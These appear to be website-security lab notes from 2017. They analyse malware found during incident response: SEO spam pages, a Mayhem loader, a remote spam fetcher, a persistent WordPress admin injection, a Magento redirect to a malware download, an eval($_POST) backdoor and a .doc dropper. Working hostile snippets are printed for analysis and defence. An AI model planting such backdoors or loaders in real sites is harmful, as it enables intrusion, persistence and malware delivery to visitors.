Soccer spam. Really?

In the last few months, we've covered several cases of SEO Spam in our labs and blog that were promoting products and services ranging from essay writing to sunglasses. From time to time, these Spam campaigns change and attackers focus on topics that may bring additional revenue. This time around, the topic was Soccer 🙂


During an Incident Response process, we found several files on the website's root folder that had nothing to do with the actual website content. Those files had PHP extensions and their filenames were either just numbers, e.g.: 1.php, 2.php, 5.php, ... or soccer team names; for instance, Real-Madrid.php, Barcelona.php, Chelsea.php, etc.

When accessing those files on a browser, we see an attempt to impersonate a Swedish online store, as you can see in the following screenshots:

In addition to that, there's a hidden iframe being loaded at the bottom pointing to hxxp://www[.]fabriksforsaljning[.]com (doesn't seem to exist anymore).

Remember that removing the offending files will not prevent your site to be attacked and infected again, since those files were uploaded using a backdoor or stolen/leaked credentials to your site. Check your access logs and ftp logs for any strange activity. This will help identifying any malicious code used to upload those files. Also, if you need professional security assistance to clean up your website, let us know.

Sep 21, 2017 by Fernando Barbosa

Mayhem malware still on the wild

Years ago, colleagues from Yandex introduced the concept of Mayhem infections.

In that post, they provided very detailed information about the malware, its functionalities and capabilities.


The interesting point of the malicious code, is its mechanisms of planting itself in the system. Even if an infected server gets the site restored from a backup and php re-installed, the malware would still be there. That happens because a compiled shared object gets copied into the system and runs as a service.

During an Incident Response investigation, we found that the Mayhem malware family is still in the wild and so we wanted to point out a few changes. This malware targets both x32 & x64 architectures, and chooses the correct shared object version to load depending on the current system’s architecture as you can see below:

$arch = 64;if (intval("9223372036854775807") == 2147483647)$arch = 32;$so = $arch == 32 ? $so32 : $so64;

Here's the code for copying and starting the malware:

$f = fopen("/usr/bin/host", "rb");if ($f) {$n = unpack("C*", fread($f, 8));$so[7] = sprintf("%c", $n[8]);fclose($f);}$n = file_put_contents("./jquery.so", $so);$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];$HBN=basename("/usr/bin/host");$SCP=getcwd();@file_put_contents("1.sh", "#!/bin/shncd '".$SCP."'nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'nexport LD_PRELOAD=./jquery.son/usr/bin/hostnunset LD_PRELOADncrontab -l|grep -v '1.sh'|grep -v crontab|crontabnfinrm 1.shnexit 0n");
@chmod("1.sh", 0777);@system("at now -f 1.sh", $ret);

Unlike the original samples, there is no reference to MAYHEM_DEBUG system variable anymore. Also, the shared object name was changed from “libworker.so” to “jquery.so”

To prevent attacks that exploit vulnerabilities in your site software, we suggest using a Web Application Firewall (WAF).

Sep 19, 2017 by Jose Martinez

SEO spam loading from external site

Many websites get compromised and used for SEO in order to drive traffic to other websites that would usually be ranked very low or completely removed by Google due to their content. Recently I found some malware pulling spam content from chinajianzhan[.]cn.


The script attackers injected is very simple, they just use the file_get_contents() function to access the crafted URL using a specific user-agent which then returns the spam content, this helps them hide the spam content from search engines.

Here is the snippet:

<?php set_time_limit(0);header("Content-Type: text/html;charset=gb2312");$Remote_server = "hxxp://www[.]chinajianzhan[.]cn/bc/";$host_name = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'];$userAgent = $_SERVER['HTTP_USER_AGENT'];$Content_mb = getHTTPPage($Remote_server . "/index.html?host=" . $host_name);echo $Content_mb;exit();function getHTTPPage($url) { $opts = array('http' => array('method' => "GET", 'header' => "User-Agent: aQ0O010O")); $context = stream_context_create($opts); $html = @file_get_contents($url, false, $context); if (empty($html)) { exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>"); } return $html;}

The original version of the code was encoded using vidun[.]com and the code was added to randomly named files like can.php and michao.php

Here is an excerpt of the original code:

<?php // This file is protected by copyright law & provided under license. Copyright(C) 2005-2009 www.vidun.com, All rights reserved. $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%7 (Trimmed) Vfe48R3E+wJL7eWp9eWpZcbO1FM4Ikoi0dBX7eWp9eWP=

We highly recommend keeping your WordPress up to date and making sure that all of your passwords are unique and secure, the impacts of SEO spam on your website can be very large, your website could rank lower in search results along with being blacklisted which can take many weeks to resolve.

Sep 13, 2017 by Krasimir Konov

Evil Self-Regenerating WordPress Administrator User

Attackers often aim to conceal their presence using different methods, such as injecting redirect scripts, creating spam pages, or hiding a mailer in checkout pages to steal credit cards; but this is not always the case.


We've seen some websites where hackers were doing the very opposite. Recently, we noticed a malicious administrative user who had managed making a permanent account to the system. When the actual website administrator attempted to remove the bad guy, WordPress reported that the user was successfully deleted. However, after reopening the Users tab, the unwanted admin user appeared again as if nothing happened.

Such behavior gives the impression that the user is a permanent part of the system since they remained in the Users tab!

After the investigation, we found that the following code was injected in the website theme functions.php file:

function admin_account(){$user = 'admin2';$pass = 'Abc12345!'; $email = 'email2@domain.com';if ( !username_exists( $user ) && !email_exists( $email ) ) {$user_id = wp_create_user( $user, $pass, $email );$user = new WP_User( $user_id );$user->set_role( 'administrator' );} }add_action('init','admin_account');

What does this snippet mean? The code is pretty simple. We can see that it defines the function named admin_account. It specifies only three parameters required for user creation – user, password, and email.

Then the if conditional statement checks if the user is already present on the system. - and if not - it creates a new one. So, the regenerating function is ready. What next?

The function needs to be triggered quite often to grant the bad user ability to regenerate immediately. For that purpose, attackers have added the last part of the code, binding the admin_account function to the init action which is triggered when most of the WordPress is loaded.

Removing the mentioned code from functions.php file ceased the "immortality" of the bad user and evil was banished.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website, even if the obvious backdoor is removed. Knowing your site’s structure and performing an active monitoring of it (being alerted whenever a file is changed or added to your site) will help you to identify the alien admin users and unwanted code injections.

If you see your site having unwanted administrator users but you can’t locate the code that is creating them, you might want to have us scan your site for malware and clean it.

Sep 1, 2017 by Andrey Kucherov

When Online Shopping leads to Malware download

Recently, during an incident response process, we worked on an interesting Magento website. This site was reported to having a strange redirection when users visited the site. Without further ado, we started investigating the issue on this site.


The site loaded pretty slow on our end, which didn’t look right. There was something holding the site back. After further checking, we found a JavaScript include with suspicious URL on the page source as below:

<script type="text/javascript" src=" hXXp://aleinvest[.]xyz/js/js"></script>

We discovered that this is a conditional URL where on the first check, we could see a JavaScript code, but on the next check the code wouldn’t display anymore. Luckily we saved the JavaScript code firsthand and it redirected the user to download an executable file named ‘plugin.exe’ from a dropbox shared link as below: 

function process() { window.location = "hXXps://www.dropbox[.]com/<snipped>/plugin.exe?dl=1"; } window.onerror = process; process()

We were able to download the ‘plugin.exe’ file (SHA256: 21f453cc5885ca7fbbb94bb0e54158c11c043318c794f7266158e7bb00190080) and quickly uploaded it to VirusTotal to get an overview of the threat. VirusTotal gives 34/59 detection ratio for this file which shows pretty clearly that it is a malware file.

Since we confirmed on the malicious component, we went back to the site infrastructure to find its source. It wasn’t long before we figured out that the JavaScript include had been stored inside Magento database on core_config_data table as shown on screenshot below;

Right after the piece of code was removed from the database, the site started loading way faster than before. Luckily the site hasn’t been flagged nor blacklisted by Google, so we could skip the blacklist removal request procedure for now.

Searching a bit on Google for this similar threat, there are just a few infections related to this one for now, but all of them are related to Magento websites.

If you look into our previous labs notes related to Magento sites, most of the threats are heavily associated with credit card stealers. Fret not! Whether it is credit card stealers, blackhat SEO, or even malware redirects, let us know if you want professional security help. We are here to secure and protect your Magento website!

Aug 28, 2017 by Ahmad Azizan

Small One-liner Backdoor

During an incident response investigation, we detected an interesting backdoor that was small but had the potential to give the attacker full access to your website and all its content.

Let’s review the backdoor content which was placed into the wp-content/themes/newaffpower/functions.php file:

@$A='Acc';$p='_';$o='P​O';$s='S';$t='T';;@​eval​(${$p.$o.$s.$t}['​WordPass']);

The attacker placed the code at the bottom of a legit file and, when called with the required field, could allow the attacker full system access of the website.

Let’s work through the malicious code step by step to see how it works and how it enables the attacker to gain access to your website files.

First, the variable $A is set to ‘Acc’ but is not used during the attack:

@$A='Acc';

The attacker then created individual entries that will be combined and then executed the malicious payload:

$p='_';
$o='PO';
$s='S';
$t='T';;

The final part of the attack is where the attacker includes his malicious payload in the ‘WordPass’ POST parameter. (Looks like \'WordPress\', but even \'WordPress\' would not make it any more legitimate)

@​ev​al($​{$p.$o.$s.$t}['WordPass']);

The complete piece of malicious code would look like the string below.

@​eval​($_POST[​'WordPass']);

In the screenshot below, I’m simulating a POST request to the website in order to gain access to important files on the server.

This will execute any content passed by the attacker that could give the attacker full access to your website files/folders.

If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

Aug 21, 2017 by Samuel Odendaal

JavaScript Used to Generate Malicious Documents

When talking about compromised environments, we often think that the website itself is the end goal but that’s not always true. In some cases, attackers shift their focus to the user instead, especially when the website has lots of traffic.

Attackers may use different techniques and one we see often is called malware dropper. A dropper is not necessarily the malware that will cause the damage itself but its main objective is to simply download another piece of malicious code (the real malware) that will then, execute the tasks attackers wanted to achieve.

During a website investigation, we detected a few JavaScript files being executed as PHP to generate other malicious files (extension: .doc - malware dropper). You can see some of the code below. It shows the name of the file being assigned, then offered to the user for download:

lt;?php
private $contentName_ = 'EHU-96470130.dokument.doc';
private $contentType_ = 'application/msword';
public

function execute()
{
 $sp363bd2 = '.' . md5(md5(basename(dirname(__FILE__))));
 touch($sp363bd2);
 $spa7a53d = fopen($sp363bd2, 'r+');

 // content clipped, too long.

 header('Cache-Control: no-cache, no-store, max-age=0, must-revalidate');
 header('Pragma: no-cache');
 header('Content-Type: ' . $this->contentType_);
 header('Content-Disposition: attachment; filename="' . $this->contentName_ . '"');
 header('Content-Transfer-Encoding: binary');
 die(base64_decode($this->content_));
}

Additional file info:

$ file EHU-96470130.dokument.doc
EHU-96470130.dokument.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May  3 14:19:00 2017, Last Saved Time/Date: Wed May  3 14:19:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0

When running that file against virustotal, 35 out of 57 engines detected the code, (mostly as W97M.Downloader, a well-known Word Macro Trojan).

Whenever the user visited a specific page from the compromised website, the .doc file had been triggered for a download. If executed on the user’s machine, that would download another trojan giving the attacker control to the user’s OS.

It’s very important to be proactive on the security of your website because as you can see, the issues may affect much more than just ranking, SEO and online presence, but also your audience.

Aug 17, 2017 by Krasimir Konov